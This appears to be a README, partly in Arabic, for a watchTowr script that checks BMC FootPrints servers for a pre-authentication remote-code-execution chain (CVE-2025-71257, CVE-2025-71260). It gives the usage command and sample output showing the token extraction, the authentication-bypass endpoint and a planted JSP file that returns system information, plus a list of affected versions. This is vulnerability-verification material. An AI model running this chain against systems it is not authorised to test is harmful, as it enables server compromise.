
مولد أثر كشف يتحقق من مثيلات BMC FootPrints من أجل سلسلة RCE غير موثقة مسبقًا (CVE-2025-71257, CVE-2025-71260) عن طريق تجاوز المصادقة وكتابة ملف JSP لتعداد معلومات النظام.
أداة توليد أثر الكشف عن سلسلة تنفيذ الأوامر عن بُعد غير الموثقة مسبقًا في BMC FootPrints
تتحقق هذه الأداة المولدة لأثر الكشف مما إذا كانت مثيل BMC FootPrints معرضة للثغرات CVE-2025-71257 و CVE-2025-71260.
تقوم الأداة المولدة لأثر الكشف بمحاولة تنفيذ عمليتين:
اختبار ضد مثيل معرض:
python3 watchTowr-vs-BMC-Footprints-RCE-CVE-2025-71257-CVE-2025-71260.py http://192.168.2.2
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-BMC-Footprints-RCE-CVE-2025-71257-CVE-2025-71260.py
(*) BMC Footprints Authentication Bypass and Remote Code Execution Detection Artifact Generator Tool
- Sonny , watchTowr ([email protected])
CVEs: [CVE-2025-71257, CVE-2025-71260]
============================================================
Detection Artifact Generator Tool
============================================================
Target: http://192.168.2.2
[+] Making first request to: http://192.168.2.2/footprints/servicedesk/passwordreset/request/
[+] Successfully extracted SEC_TOKEN: wgLCxepla-NTW9VSXIxyzNiq7HFJ0-CEFnbzlObKu3Ktv3B33h
[+] Making second request to: http://192.168.2.2footprints/servicedesk/aspnetconfig
[+] Using token: wgLCxepla-NTW9VSXIxyzNiq7HFJ0-CEFnbzlObKu3Ktv3B33h
[+] Using randomized JSP name: MNdeu12Wf
[+] Making third request to: http://192.168.2.2/MNdeu12Wf.jsp (randomized artifact)
==================================================
EXTRACTED INFORMATION:
==================================================
Username: LOCAL SERVICE
Working Directory: C:\Program Files\Apache Software Foundation\Tomcat 9.0
==================================================
[+] Detection Artifact Generator Completed!
BMC FootPrints: from 20.20.02 to 20.24.01.001
20.20.02, 20.20.03.002, 20.21.01.001, 20.21.02.002, 20.22.01, 20.22.01.001, 20.23.01, 20.23.01.002, 20.24.01
لأحدث الأبحاث الأمنية تابع فريق مختبرات watchTowr